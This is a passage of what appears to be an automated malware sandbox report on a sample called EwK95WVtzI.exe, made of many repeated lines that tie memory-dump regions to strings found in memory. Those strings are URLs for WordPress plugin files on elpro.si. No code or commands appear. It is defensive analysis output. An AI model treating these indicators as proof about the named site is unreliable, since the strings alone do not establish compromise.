00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/imagesloaded.pkgd
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/jquery.qtip.js?ve
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mimetypes-link-icons/css/style.php?cssvars=bXRsaV9oZWlnaHQ9MT
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mimetypes-link-icons/js/mtli-str-replace.min.js?ver=3.1.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/perfect-woocommerce-brands/build/frontend/css/style.css?ver=3
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/perfect-woocommerce-brands/build/frontend/js/index.js?ver=2c7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/../images/close.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/../images/logo.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/css/sassy-social-share-public.css?v
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.js?ver
                Source: EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sit
                Source: EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/dist/css/blocks/styles.css?ver=4.6
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/sl.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 